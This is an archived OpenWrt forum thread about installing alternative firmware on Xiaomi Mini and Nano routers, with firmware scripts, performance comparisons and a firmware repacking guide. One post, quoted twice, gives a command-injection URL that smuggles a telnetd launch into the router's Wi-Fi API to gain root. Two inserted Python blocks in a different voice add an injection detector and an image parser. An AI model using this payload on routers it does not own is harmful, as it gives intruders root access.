OpenWrt Forum Archive

Topic: Installing OpenWrt in Xiaomi Wifi Mini

The content of this topic has been archived between 8 Feb 2018 and 5 May 2018. Unfortunately there are posts – most likely complete pages – missing.

Hello

Can someone translate and try this? http://admin-to-admin.info/blog/proshiv … a-padavan/

https://gitlab.com/Track/xrmwrt

Edit:

https://www.youtube.com/watch?v=Dv0gfVqFLYU

https://yadi.sk/d/nEQ2JO6LiXFNm  Instructions are inside, in a .txt file (use Google Translate).

The latest version (?) is this: http://routerclub.ru/upload/padavan/nig … /xrm_base/

Easy, follow the instructions on this site: http://wifika.ru/proshivka-routera-xiao … -asus.html

Edit:

Wow, works great. English language.
Operation Mode: AP-Client + AP

http://imgur.com/BMKOpFF

JM

Portugal

(Last edited by jjmmdanp on 6 Dec 2015, 21:08)

I ordered Xiaomi mini and nano (youth) routers from Aliexpress. Now I have upgraded the mini to OpenWrt. I don't want to open the nano, because I am not a HW guy.

I opened the Xiaomi nano firmware FS and it seems that there is a /bin/flash.sh file. Is that a common OpenWrt file or a Xiaomi-specific file? Maybe this file is called from the router settings page?
Maybe it would be possible to modify the flash.sh script in a way that it accepts the PandoraBox-ralink-mt7628-xiaomi-r1cl-squashfs-sysupgrade-r1468-20151001.bin file.

flash.sh file:

#!/bin/sh
#

. /lib/upgrade/common.sh

klogger(){
    local msg1="$1"
    local msg2="$2"

    if [ "$msg1" = "-n" ]; then
        echo  -n "$msg2" >> /dev/kmsg 2>/dev/null
    else
        echo "$msg1" >> /dev/kmsg 2>/dev/null
    fi

    return 0
}

hndmsg() {
    if [ -n "$msg" ]; then
        echo "$msg" >> /dev/kmsg 2>/dev/null
        if [ `pwd` = "/tmp" ]; then
            rm -rf $filename 2>/dev/null
        fi
        exit 1
    fi
}

upgrade_uboot() {
    if [ -f uboot.bin ]; then
        klogger -n "Burning uboot..."
        mtd write uboot.bin Bootloader >& /dev/null
        if [ $? -eq 0 ]; then
            klogger "Done"
        else
            klogger "Error"
            exit 1
        fi
    fi
}

upgrade_firmware() {
    if [ -f firmware.bin ]; then
        klogger -n "Burning firmware..."
        mtd -r write firmware.bin OS1 >& /dev/null
        if [ $? -eq 0 ]; then
            klogger "Done"
        else
            klogger "Error"
            exit 1
        fi
    fi
}


if [ $# = 0 ] || [ $# -gt 2 ] ; then
    klogger "USAGE: $0 factory.bin 0(0:reboot, 1:don't reboot)"
    exit 1;
fi

#check pid exist
pid_file="/tmp/pid_xxxx"
if [ -f $pid_file ]; then
    exist_pid=`cat $pid_file`
    if [ -n $exist_pid ]; then
        kill -0 $exist_pid 2>/dev/null
        if [ $? -eq 0 ]; then
            klogger "Upgrading, exit... $?"
            exit 1
        else
            echo $$ > $pid_file
        fi
    else
        echo $$ > $pid_file
    fi
else
    echo $$ > $pid_file
fi

_ver=`cat /usr/share/xiaoqiang/xiaoqiang_version`
klogger "Begin Ugrading..., current version: $_ver"

echo 3 > /proc/sys/vm/drop_caches
sync

[ -f $1 ] || msg="dir: $1 is not existed, upgrade failed"
hndmsg

dir_name=`dirname $1`
klogger "Change Dir to: $dir_name"
cd $dir_name

filename=`basename $1`
[ -f $filename ] || msg="file: $filename is not existed, upgrade failed"
hndmsg

klogger -n "Verify Image: $filename..."
mkxqimage -v $filename || msg="Check Failed!!!"
hndmsg
klogger "Checksum O.K."
echo 32 > /proc/sys/vm/pagecache_limit_mb

wifi down
rmmod mt7628


if [ -f "/etc/init.d/sysapihttpd" ] ;then
    /etc/init.d/sysapihttpd stop 2>/dev/null
fi

if [ $dir_name != "/tmp" ]; then
    klogger "Change Dir to /tmp"
        cp $1 /tmp
        cd /tmp
fi

# gently stop pppd, let it close pppoe session
ifdown wan
timeout=5
while [ $timeout -gt 0 ]; do
    pidof pppd >/dev/null || break
    sleep 1
    let timeout=timeout-1
done

# clean up upgrading environment
# call shutdown scripts with some exceptions
wait_stat=0
klogger "Calling shutdown scripts"
for i in /etc/rc.d/K*; do
    # filter out K01reboot-wdt and K99umount
    echo "$i" | grep -q '[0-9]\{1,100\}reboot-wdt$'
    if [ $? -eq 0 ]
    then
        klogger "$i skipped"
        continue
    fi
    echo "$i" | grep -q '[0-9]\{1,100\}umount$'
    if [ $? -eq 0 ]
    then
        klogger "$i skipped"
        continue
    fi

    if [ ! -x "$i" ]
    then
        continue
    fi

    # wait for high-priority K* scripts to finish
    echo "$i" | grep -qE "K9"
    if [ $? -eq 0 ]
    then
        if [ $wait_stat -eq 0 ]
        then
            wait
            sleep 2
            wait_stat=1
        fi
        $i shutdown 2>&1
    else
        $i shutdown 2>&1 &
    fi
done

# try to kill all userspace processes
# at this point the process tree should look like
# init(1)---sh(***)---flash.sh(***)
for i in $(ps w | grep -v "flash.sh" | grep -v "/bin/ash" | grep -v "PID" | awk '{print $1}'); do
        if [ $i -gt 100 ]; then
            kill -9 $i 2>/dev/null
        fi
done

gpio 1 1
gpio 3 1
gpio l 44 2 2 1 0 4000 #led yellow flashing

#update nvram setting when upgrading
if [ "$2" = "1" ]; then
    nvram set restore_defaults=1
    klogger "Restore defaults is set."
else
    nvram set restore_defaults=2
fi
nvram set flag_flash_permission=0
nvram set flag_ota_reboot=1
nvram set flag_upgrade_push=1
nvram commit

# tell server upgrade is finished
uci set /etc/config/messaging.deviceInfo.UPGRADE_STATUS_UPLOAD=0
uci commit
klogger "messaging.deviceInfo.UPGRADE_STATUS_UPLOAD=`uci get /etc/config/messaging.deviceInfo.UPGRADE_STATUS_UPLOAD`"
klogger "/etc/config/messaging : `cat /etc/config/messaging`"

# prepare the minimum working environment
mount -o remount,size=100% /tmp
lib_list="/lib/ld-uClibc.so.0 /lib/libc.so.0 /lib/libdl.so.0 /lib/libm.so.0 \
/lib/libubox.so /lib/libcrypt.so.0 /lib/libgcc_s.so.1 /usr/lib/libcrypto.so.1.0.0"
bin_list="/bin/busybox /bin/ash /bin/sh /bin/cat /bin/mount /bin/umount \
/bin/mkxqimage /sbin/reboot /usr/sbin/nvram"

mkdir -p /tmp/update_environment/lib
mkdir -p /tmp/update_environment/bin
mkdir -p /tmp/update_environment/proc
mkdir -p /tmp/update_environment/dev
mkdir -p /tmp/update_environment/usr/share/xiaoqiang/
for lib in $lib_list
do
    if [ -e $lib ]
    then
        cp -L $lib /tmp/update_environment/lib
    else
        # in case the lib_list is outdated, abort early
        msg="Lib $lib not found"
        hndmsg
        reboot -f
    fi
done
for bin in $bin_list
do
    if [ -e $bin ]
    then
        cp -P $bin /tmp/update_environment/bin
    else
        # in case the bin_list is outdated, abort early
        msg="Bin $bin not found"
        hndmsg
        reboot -f
    fi
done
cp /usr/share/xiaoqiang/public.pem /tmp/update_environment/usr/share/xiaoqiang/
mv $filename /tmp/$filename
pivot /tmp/update_environment /old_root && {
    umount -l /old_root
    klogger "Switch to ram-based rootfs"
}

klogger -n "Begin Upgrading and Rebooting..."
mkxqimage -w /tmp/$filename || msg="Upgrade Failed!!!"
hndmsg

(Last edited by UbuntuInMacBook on 6 Dec 2015, 23:45)

The problem is how to call that function

netomx wrote:

The problem is how to call that function

My assumption was that this function is called from the configuration web page, but before that it verifies the file. Maybe the verify function is also in this same script.
Now I got the error "Couldn't verify file".

If that is true, then just modify the script in the binary file and update the router with this first.

(Last edited by UbuntuInMacBook on 7 Dec 2015, 00:21)

Or just add a crontab which runs wget and then flashes the binary... just easy smile
1) cd /tmp
2) wget http://downloads.openwrt.org.cn/Pandora … 151001.bin
3) mtd -r write PandoraBox-ralink-mt7628-xiaomi-r1cl-squashfs-sysupgrade-r1468-20151001.bin OS1

What do you think could it work?

I believe you've been looking in the wrong place wink

1. /usr/sbin/checkupgrade.lua
2. /usr/lib/lua/xiaoqiang/util/XQSysUtil.lua:verifyImage()
3. /usr/lib/lua/xiaoqiang/util/XQSysUtil.lua:getMiscHardwareInfo()

Which fetches

4. option verify 'cd /tmp;mkxqimage -v ', from uci/misc config

And runs the "mkxqimage -v" file. '-v' for verify (or Vendetta!) I guess.

From that point on it is easy, replace /bin/mkxqimage or disassemble wink

[EDIT]
By the way "nvram set ssh_en 1" is the ssh enabling command.

(Last edited by santamanno on 9 Dec 2015, 16:11)

I bought this router recently and immediately re-flashed it with the most recent stable (Chaos Calmer). At first glance all seemed to work with no errors appearing but I experienced the performance issues others had described before (weak signal, slow speeds, connection dying off when idle and requiring reconnect). While looking around to see what solutions are available I found this thread. Thanks to all the contributors for all the helpful bits of information.

To share my experience, while OpenWrt performance seems to be marginally better with the trunk branch (Designated Driver), after some patches were committed, it's still a far cry from what the device should be capable of.

In a very unscientific way, I compared some of the firmwares circulating around. The results, in the order of decreasing performance, are as follows:

  1. PandoraBox r1216 (2015-07-21) (source)

  2. OpenWrt w/RSSN Patch (2015-12-06) (source)

  3. Padavan (2015-11-13) (source)

  4. OpenWrt Designated Driver (2015-11-22)

  5. OpenWrt Chaos Calmer 15.05 (2015-09-14)

To quantify, OpenWrt's performance seems to be at around 33% to 50% of Pandora Box's in terms of speed. I understand this is due to MediaTek (RaLink)'s disregard for the open source community. It would be really great if this gap is eventually bridged though.

As an aside, upgrading from stable to trunk I was cut off from SSH in a weird way, which didn't happen with another access point I was upgrading at the same time (TL-WR1043NDv1). Perhaps this was due to the device name change and that I chose to preserve the settings but I didn't investigate the exact reason so it's just a rough guess.

Edit / Question: Has anyone been able to successfully use failsafe mode to login over SSH (or Telnet) with this device? For me, it boots into failsafe mode correctly (confirmed by the rapid LED flashing) and the first UDP packet is received too but then it doesn't respond to pings nor does it accept any SSH connections (also checked Telnet just in case). I tried with each of the 3 Ethernet ports, starting from a separate boot, and also confirmed the failsafe mode works fine with another device I have access to (TL-WR1043NDv1) to exclude a problem with my setup as a potential cause. This happens with the latest trunk (r47548 of 2015-11-22), haven't checked other versions. Perhaps the cause is similar to this resolved bug, as this router has some ports not connected to any physical interface?

(Last edited by StrangeOrange on 10 Dec 2015, 09:57)

StrangeOrange wrote:

Edit / Question: Has anyone been able to successfully use failsafe mode to login over SSH (or Telnet) with this device? For me, it boots into failsafe mode correctly (confirmed by the rapid LED flashing) and the first UDP packet is received too but then it doesn't respond to pings nor does it accept any SSH connections (also checked Telnet just in case).?

I see this exact same behavior.

In case you want to skip all the Xiaomi download etc, here are some instructions to flash OpenWRT/PandoraBox directly on the stock firmware via a code injection bug.

NOTE
This method has been successfully tested on
-> Xiaomi Mini - Stock firmware v2.6.17
-> Xiaomi Lite aka "Youth" or "Nano" - Stock firmware v2.2.8

STEPS
1) Power on and setup the Xiaomi router until it reboots and gets IP address 192.168.31.1
2) Log in to the router and grab the value of the stok URL parameter (for instance: "9c2428de4d17e2db7e5a6a337e6f57a3")
3) Replace the <STOK> placeholder and load this URL in your browser or curl, this will start telnetd on the router:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd

It should spit out some wifi error code, that is ok, don't worry.

4) Replace the <STOK> placeholder, the current password and the desired root password and load this URL in your browser or curl; this will set the router root password.

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqsystem/set_name_password?oldPwd=<CURRENTPASS>&newPwd=<NEWPASS>

It should spit out: {"code":0}

5) Telnet to the router, enter user root and NEWPASS chosen above.

6) wget your favourite .bin and flash with mtd -r write firmware.bin OS1

7) Router reboots wink

Hope it helps, just wanted to give back my two cents to the community.

(Last edited by santamanno on 13 Dec 2015, 22:09)
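A defender's counterpart to the injection described in santamanno's post, added here as an example (it is not from the thread or from Xiaomi's firmware): the strict per-parameter allow-list that a fixed handler would apply before any value reaches a shell, run as a detector over web-server access-log lines. The endpoint path, parameter names and the channel=1%3B%2Fusr%2Fsbin%2Ftelnetd payload come from the post; the log format, client address, stok value and the benign parameter values are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list per parameter, as it would look in a fixed handler: the channel is a
# small integer and nothing else (assumption: the stock API needs nothing beyond that).
# Patterns are applied with fullmatch() so a trailing "\n" cannot slip past a '$'.
PARAM_RULES = {
    "channel": re.compile(r"[0-9]{1,3}"),
    "encryption": re.compile(r"[A-Za-z0-9_-]{1,16}"),
    "enctype": re.compile(r"[A-Za-z0-9_-]{1,16}"),
}
# For free-form parameters (ssid, passwords) only flag characters that change the
# meaning of a command line when the value is interpolated into it.
SHELL_META = re.compile(r"[;&|`$(){}<>\\\n\r]")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def validate_params(pairs):
    """Return a list of problems for (name, decoded_value) pairs; empty means clean.
    In a fixed handler this runs before any value is spliced into a command."""
    problems = []
    for name, value in pairs:
        rule = PARAM_RULES.get(name)
        if rule is not None:
            if rule.fullmatch(value) is None:
                problems.append(f"{name}={value!r} fails allow-list /{rule.pattern}/")
        elif SHELL_META.search(value):
            problems.append(f"{name}={value!r} contains shell metacharacters")
    return problems


def analyse_request(target):
    """Split a request target into its /api/... endpoint and validate every query
    parameter after percent-decoding (so %3B is judged as ';', not as text)."""
    parts = urlsplit(target)
    endpoint = parts.path
    if "/api/" in endpoint:
        endpoint = "/api/" + endpoint.split("/api/", 1)[1]
    pairs = [(k, v) for k, vals in parse_qs(parts.query, keep_blank_values=True).items()
             for v in vals]  # repeated parameters are all checked, not just the last
    return endpoint, validate_params(pairs)


def scan_log(lines):
    """Return (client, endpoint, problem) for every suspicious request in an access log."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        endpoint, problems = analyse_request(match.group(1))
        client = line.split(" ", 1)[0]
        findings.extend((client, endpoint, p) for p in problems)
    return findings


# Constructed access-log excerpt (common log format); the stok value is made up.
# Line 2 carries the channel=1%3B%2Fusr%2Fsbin%2Ftelnetd payload shown in the thread.
SAMPLE_LOG = [
    '192.168.31.100 - - [13/Dec/2015:21:58:11 +0100] "GET /cgi-bin/luci/;stok=0123456789abcdef0123456789abcdef'
    '/api/xqnetwork/set_wifi_ap?ssid=home&encryption=psk2&enctype=aes&channel=6 HTTP/1.1" 200 57',
    '192.168.31.100 - - [13/Dec/2015:22:01:42 +0100] "GET /cgi-bin/luci/;stok=0123456789abcdef0123456789abcdef'
    '/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE'
    '&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd HTTP/1.1" 200 63',
    '192.168.31.100 - - [13/Dec/2015:22:02:05 +0100] "GET /cgi-bin/luci/;stok=0123456789abcdef0123456789abcdef'
    '/api/xqsystem/set_name_password?oldPwd=old&newPwd=new HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for client, endpoint, problem in scan_log(SAMPLE_LOG):
        print(f"{client} {endpoint}: {problem}")
```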

very good, between 5 and 6 you can run:

nvram set uart_en=1
nvram commit

to enable serial console.

(Last edited by anarchy99 on 12 Dec 2015, 20:25)

StrangeOrange wrote:

Edit / Question: Has anyone been able to successfully use failsafe mode to login over SSH (or Telnet) with this device? For me, it boots into failsafe mode correctly (confirmed by the rapid LED flashing) and the first UDP packet is received too but then it doesn't respond to pings nor does it accept any SSH connections (also checked Telnet just in case). I tried with each of the 3 Ethernet ports, starting from a separate boot, and also confirmed the failsafe mode works fine with another device I have access to (TL-WR1043NDv1) to exclude a problem with my setup as a potential cause. This happens with the latest trunk (r47548 of 2015-11-22), haven't checked other versions. Perhaps the cause is similar to this resolved bug, as this router has some ports not connected to any physical interface?

Don't you need also support in U-BOOT for this?

Is there any way to enable VLAN tagging up to 4096?
My ISP needs VLAN 500 for connecting to the internet.

(Last edited by zhuoyang on 13 Dec 2015, 11:04)

santamanno wrote:

...

This is an amazing hack, wish I knew about it before, as I needed to unlock it the pedestrian way. If you could just specify the version it worked with, as I think they'll patch it up eventually.

Benik3 wrote:
StrangeOrange wrote:

Edit / Question: Has anyone been able to successfully use failsafe mode to login over SSH (or Telnet) with this device? For me, it boots into failsafe mode correctly (confirmed by the rapid LED flashing) and the first UDP packet is received too but then it doesn't respond to pings nor does it accept any SSH connections (also checked Telnet just in case). I tried with each of the 3 Ethernet ports, starting from a separate boot, and also confirmed the failsafe mode works fine with another device I have access to (TL-WR1043NDv1) to exclude a problem with my setup as a potential cause. This happens with the latest trunk (r47548 of 2015-11-22), haven't checked other versions. Perhaps the cause is similar to this resolved bug, as this router has some ports not connected to any physical interface?

Don't you need also support in U-BOOT for this?

I don't see why that should be the case. Basically the bootloader just loads the kernel, which then takes full control. OpenWrt documentation does not mention such a precondition anywhere and my TL-WR1043NDv1 with stock bootloader can be accessed in failsafe mode without problems. Further, the bootloader cannot distinguish between failsafe and regular mode because which mode the device will boot into is determined by the press of a button after the bootloader has already completed, so if this were caused by the bootloader, the network would need to be down all the time, which is not the case. I might of course be wrong but based on what I know I find it hard to believe. Is there any reference to support it?

Talking about bootloaders I found a great one called Breed (download - will always link to latest version, description - in Chinese only). It can do a lot but the most basic way to use it is: flash it, power off, hold the reset button while powering back on, plug the Ethernet cable, you'll get a DHCP lease (so no need to set the IP address manually) and can then go to http://192.168.1.1/ to flash any firmware. Apparently replacing the stock bootloader is recommended because flashing a firmware larger than 8 MiB has the potential to overwrite the serial number, and if that happens then if the stock firmware is reflashed there will be no access to SSH anymore (the above hack posted by santamanno excepted). Caveat: the interface is only in Chinese too.

As for the failsafe issue, the documentation does say that the WAN port must be disconnected for it to work, and since this device has a complicated port setup, another explanation might be that the device mistakenly treats one of the always-on ports as the WAN port and, thinking it's connected, cuts off all access. One thing I read on some Chinese forum (can't find the link now) hinted at something like that interfering with failsafe, mentioning to only ever use the middle port for it (LAN port #1) but that did not work for me either. (To be absolutely clear about all the circumstances, all my failsafe experiments were done with the stock bootloader, so a custom bootloader issue is not a factor either.)

(Last edited by StrangeOrange on 13 Dec 2015, 13:54)

It was just an idea, I know that the original bootloader is a little cut down (e.g. it doesn't support serial by default).

Anyway thanks for the Breed! smile
Another "full" bootloader could also be the one from WiTi (but it will probably need to be built specially for MiWiFi)
https://mqmaker.com/
http://ftp.mqmaker.com/WiTi/
https://github.com/mqmaker/witi-uboot

(Last edited by Benik3 on 13 Dec 2015, 14:22)

StrangeOrange wrote:
santamanno wrote:

...

This is an amazing hack, wish I knew about it before, as I needed to unlock it the pedestrian way. If you could just specify the version it worked with, as I think they'll patch it up eventually.

Thank you.

The funny thing is that I actually found this on the Xiaomi Lite (aka Youth/Nano), because I did not want to crack it open right away for serial flashing.

For the sake of completeness, I've just downloaded both latest stock firmwares and uncompressed them and they both still contain the bug:

Xiaomi Mini v2.6.17
Xiaomi Lite aka "Youth" or "Nano" v2.2.8

IMHO they need heavy patching, there are plenty of other "backdoors" as far as I can tell wink

Long post. Scroll down to the first heading to skip the non-technical part.

As much as I'd love to use bleeding-edge OpenWrt proper on this router, I find the Wi-Fi performance too disappointing compared to Pandora Box, so I'm reluctantly warming up towards the idea of staying with the latter for the time being.

Pandora Box is a partly-relabeled, Chinese fork of an older OpenWrt release (Barrier Breaker 14.07) that apparently includes some changes to the Wi-Fi driver that make its performance better. To the extent that I know of, the source code has not been made available, so the driver changes cannot be ported back to OpenWrt proper.

Pandora Box also includes nearly 200 add-on packages not present in the default OpenWrt installation, some of which I have little use for and would not want clogging up the limited resources of the router (examples include stuff related to bypassing the Internet censorship in China, etc. or a driver for some specific Huawei hardware). I also feel every such package can become a potential security problem, especially as they come from an outdated fork that is not being updated often.

The packages can be "uninstalled" but that does not mean they actually disappear from the flashed firmware and free up the space, which is what I'd ideally want to happen. What I'm up to then is getting rid of them by editing the *.bin file before flashing it.

So far I haven't made any changes and I'm not sure how much of the plan I'll be carrying out, as it is a time-consuming endeavor, but I wanted to share the editing method that I have just confirmed to work:


Making changes to OpenWrt read-only filesystem
by editing the sysupgrade .bin before flashing the firmware

I'm doing this to modify the closed-source Pandora Box binary firmware for the Xiaomi MiWiFi Mini, but this method can be easily adapted to other scenarios.

  • Download the latest Pandora Box version for the Xiaomi MiWiFi Mini. At the moment it is:
    PandoraBox-ralink-mt7620-xiaomi-mini-squashfs-sysupgrade-r1216-20150721.bin
    MD5 Sum: f65a34a40c29eddc04989ad95458c1f9

  • For brevity, rename the file to fw.bin.

  • The structure of the file is as follows:
    To calculate the size, subtract each offset from the one that immediately follows it.
    If you are working with a different file, you need to manually analyze it at this point with a hex editor.

Offset   Size     Object    Remarks
      0  1196846  Kernel
1196846  6509218  SquashFS  Begins with "hsqs"
7706064   158260  Padding   Consists of 0xFF with occasional 0xDEADC0DE
7864324           EOF

  • Split the file into parts. The syntax using dd(1):
    You could also try split(1), perhaps csplit(1), or an interactive hex editor.


    dd if=fw.bin of=fw_kernel.bin bs=1 count=1196846
    dd if=fw.bin of=fw_fs.bin bs=1 skip=1196846 count=6509218
    dd if=fw.bin of=fw_padding.bin bs=1 skip=7706064 count=158260


  • Optional: Check to make sure we got the numbers right:


    cat fw_kernel.bin fw_fs.bin fw_padding.bin | cmp -l fw.bin


  • Optional: Check the filesystem metadata (superblock) and save a list of all files alongside their permissions.


    unsquashfs -s fw_fs.bin
    unsquashfs -ll fw_fs.bin >fw_fs_ls.txt


  • Unpack the filesystem:


    unsquashfs -d fw_fs fw_fs.bin


  • The partition has been unpacked into the fw_fs directory. You can now remove, insert or edit any of the files there.


    cd fw_fs
    [Add your customizations here]
    cd ..


  • Repack the filesystem back into the archive:
    The two -p options at the end (the part marked in green in the original post) will generally not be necessary unless you unpacked the archive to a filesystem that cannot store device files. It is harmless to leave them though, as if the device files are already present it will only raise a warning.


    mksquashfs fw_fs fw_fs_mod.bin -nopad -noappend -root-owned -comp xz -Xpreset 9 -Xe -Xlc 0 -Xlp 2 -Xpb 2 -b 256k -p '/dev d 755 0 0' -p '/dev/console c 600 0 0 5 1'


  • Alternative: The above command requires a patched version of mksquashfs (comes with the OpenWrt build environment). The regular version will not accept the compression settings -Xpreset 9 -Xe -Xlc 0 -Xlp 2 -Xpb 2 (highlighted in blue in the original post). If you only have this version like I did, omitting those parameters will still yield a working result, although with a slightly larger file (~100 KiB in my case).
    Open question: perhaps the dictionary size should be adjusted with -Xdict-size.


    mksquashfs fw_fs fw_fs_mod.bin -nopad -noappend -root-owned -comp xz -b 256k -p '/dev d 755 0 0' -p '/dev/console c 600 0 0 5 1'


  • Merge everything back together into a single flashable file:
    Copying over the old padding is the lazy way of doing things; this part could be improved upon. For starters, according to a casual glance at the source code, the only thing that needs to be present is a single instance of 0xDEADC0DE to mark the beginning of the jffs2 partition; other than that, the padding is there only to work around some bootloader problems, which might not even be present on this device. A new padding can also be generated with the padjffs2 tool from the OpenWrt build environment. It also appears that the partition size should not exceed 8 MiB, so if you add a lot of files, you might want to adjust the padding accordingly.


    cat fw_kernel.bin fw_fs_mod.bin fw_padding.bin > fw_mod.bin


  • Reflash the new firmware, fw_mod.bin.
    In my case, I needed to discard the old settings to make it boot properly.


    sysupgrade -n fw_mod.bin


Thanks for bearing with me. Hope someone finds the above useful. Note that while it works for me, all the usual disclaimers apply: do any of the above at your own peril.

I found the following resources very helpful in the course of figuring out what to do:
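The hex-editor layout analysis, the dd split, the `cmp` round-trip check and the final `cat` merge from the procedure above can be automated. The following is an added example (mine, not StrangeOrange's or PandoraBox's code): it locates the SquashFS by its "hsqs" magic, reads the filesystem length from the superblock's bytes_used field, checks that what follows is only 0xFF filler and 0xDEADC0DE markers, and rebuilds the image in memory with a size check against the 8 MiB limit the post mentions. It assumes the first "hsqs" in the file is the real superblock, and it works on a small image constructed inline rather than on the real fw.bin.

```python
import struct
from dataclasses import dataclass, field

SQUASHFS_MAGIC = b"hsqs"          # SquashFS 4.x little-endian superblock magic
EOF_MARKER = b"\xde\xad\xc0\xde"  # 0xDEADC0DE as it appears in the padding
SUPERBLOCK_LEN = 96               # SquashFS 4.x superblock size in bytes
BYTES_USED_OFFSET = 40            # after 5 x u32, 6 x u16 and the u64 root_inode
MAX_IMAGE_SIZE = 8 * 1024 * 1024  # the 8 MiB limit the post warns about


@dataclass
class Layout:
    kernel: bytes
    squashfs: bytes
    padding: bytes
    warnings: list = field(default_factory=list)


def parse_image(img: bytes) -> Layout:
    """Locate kernel | SquashFS | padding the way the post does with a hex editor.
    The SquashFS starts at the first 'hsqs' (assumption: the compressed kernel does
    not happen to contain that string) and its length comes from the superblock."""
    fs_start = img.find(SQUASHFS_MAGIC)
    if fs_start < 0 or fs_start + SUPERBLOCK_LEN > len(img):
        raise ValueError("no complete SquashFS superblock ('hsqs') found")
    (bytes_used,) = struct.unpack_from("<Q", img, fs_start + BYTES_USED_OFFSET)
    fs_end = fs_start + bytes_used
    if fs_end > len(img):
        raise ValueError(f"superblock claims {bytes_used} bytes but image is too short")
    layout = Layout(img[:fs_start], img[fs_start:fs_end], img[fs_end:])
    # Padding must be 0xFF filler plus 0xDEADC0DE markers; anything else means the
    # split is off (e.g. a 4K-padded SquashFS whose zero tail was taken for padding).
    leftover = layout.padding.replace(EOF_MARKER, b"").replace(b"\xff", b"")
    if leftover:
        layout.warnings.append(f"{len(leftover)} unexpected byte(s) in padding region")
    if EOF_MARKER not in layout.padding:
        layout.warnings.append("no 0xDEADC0DE marker after the SquashFS")
    return layout


def describe(layout: Layout) -> list:
    """Offset/size table in the form the post shows: (offset, size, object)."""
    k, f, p = len(layout.kernel), len(layout.squashfs), len(layout.padding)
    return [(0, k, "Kernel"), (k, f, "SquashFS"), (k + f, p, "Padding"), (k + f + p, 0, "EOF")]


def reassemble(layout: Layout, squashfs=None) -> bytes:
    """Kernel + (replacement) SquashFS + old padding, the post's `cat` step. With no
    replacement this must reproduce the input byte for byte (the `cmp -l` check)."""
    fs = layout.squashfs if squashfs is None else squashfs
    out = layout.kernel + fs + layout.padding
    if len(out) > MAX_IMAGE_SIZE:
        raise ValueError(f"{len(out)} bytes exceeds the {MAX_IMAGE_SIZE} byte limit")
    return out


def make_sample_image() -> bytes:
    """Constructed stand-in for fw.bin, not the real PandoraBox image."""
    kernel = b"\x27\x05\x19\x56" + bytes(range(256)) * 4   # uImage magic + filler
    body = b"\x00" * 400                                     # stand-in for fs tables
    sb = bytearray(SUPERBLOCK_LEN)
    sb[0:4] = SQUASHFS_MAGIC
    struct.pack_into("<I", sb, 12, 256 * 1024)              # block_size, as in -b 256k
    struct.pack_into("<H", sb, 20, 4)                       # compression_id 4 = XZ
    struct.pack_into("<HH", sb, 28, 4, 0)                   # version 4.0
    struct.pack_into("<Q", sb, BYTES_USED_OFFSET, SUPERBLOCK_LEN + len(body))
    padding = b"\xff" * 60 + EOF_MARKER + b"\xff" * 60 + EOF_MARKER
    return kernel + bytes(sb) + body + padding


if __name__ == "__main__":
    image = make_sample_image()
    layout = parse_image(image)
    print("Offset   Size     Object")
    for offset, size, name in describe(layout):
        print(f"{offset:>7}  {size:>7}  {name}")
    assert reassemble(layout) == image
    print("warnings:", layout.warnings or "none")
```

On a real image, write `layout.kernel`, `layout.squashfs` and `layout.padding` to the three files the post names, and feed the repacked fw_fs_mod.bin to `reassemble()` in place of the original SquashFS.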

Great work. Huge thanks.

(Last edited by augustus_meyer on 14 Dec 2015, 10:32)

This is awesome. Thanks!

santamanno wrote:

In case you want to skip all the Xiaomi download etc, here are some instructions to flash OpenWRT/PandoraBox directly on the stock firmware via a code injection bug.

NOTE
This method has been successfully tested on
-> Xiaomi Mini - Stock firmware v2.6.17
-> Xiaomi Lite aka "Youth" or "Nano" - Stock firmware v2.2.8

STEPS
1) Power on and setup the Xiaomi router until it reboots and gets IP address 192.168.31.1
2) Log in to the router and grab the value of the stok URL parameter (for instance: "9c2428de4d17e2db7e5a6a337e6f57a3")
3) Replace the <STOK> placeholder and load this URL in your browser or curl, this will start telnetd on the router:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd

It should spit out some wifi error code, that is ok, don't worry.

4) Replace the <STOK> placeholder, the current password and the desired root password and load this URL in your browser or curl; this will set the router root password.

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqsystem/set_name_password?oldPwd=<CURRENTPASS>&newPwd=<NEWPASS>

It should spit out: {"code":0}

5) Telnet to the router, enter user root and NEWPASS chosen above.

6) wget your favourite .bin and flash with mtd -r write firmware.bin OS1

7) Router reboots wink

Hope it helps, just wanted to give back my two cents to the community.

Excellent, this worked for me.
Big thanks to you santamanno!!
Don't know how you found this injection bug; it works for me  smile

santamanno wrote:

In case you want to skip all the Xiaomi download etc, here are some instructions to flash OpenWRT/PandoraBox directly on the stock firmware via a code injection bug.

NOTE
This method has been successfully tested on
-> Xiaomi Mini - Stock firmware v2.6.17
-> Xiaomi Lite aka "Youth" or "Nano" - Stock firmware v2.2.8

STEPS
1) Power on and setup the Xiaomi router until it reboots and gets IP address 192.168.31.1
2) Log in to the router and grab the value of the stok URL parameter (for instance: "9c2428de4d17e2db7e5a6a337e6f57a3")
3) Replace the <STOK> placeholder and load this URL in your browser or curl, this will start telnetd on the router:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd

It should spit out some wifi error code, that is ok, don't worry.

4) Replace the <STOK> placeholder, the current password and the desired root password and load this URL in your browser or curl; this will set the router root password.

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqsystem/set_name_password?oldPwd=<CURRENTPASS>&newPwd=<NEWPASS>

It should spit out: {"code":0}

5) Telnet to the router, enter user root and NEWPASS chosen above.

6) wget your favourite .bin and flash with mtd -r write firmware.bin OS1

7) Router reboots wink

Hope it helps, just wanted to give back my two cents to the community.

mikeoke wrote:

Excellent, this worked for me.
Big thanks to you santamanno!!
Don't know how you found this injection bug; it works for me  smile

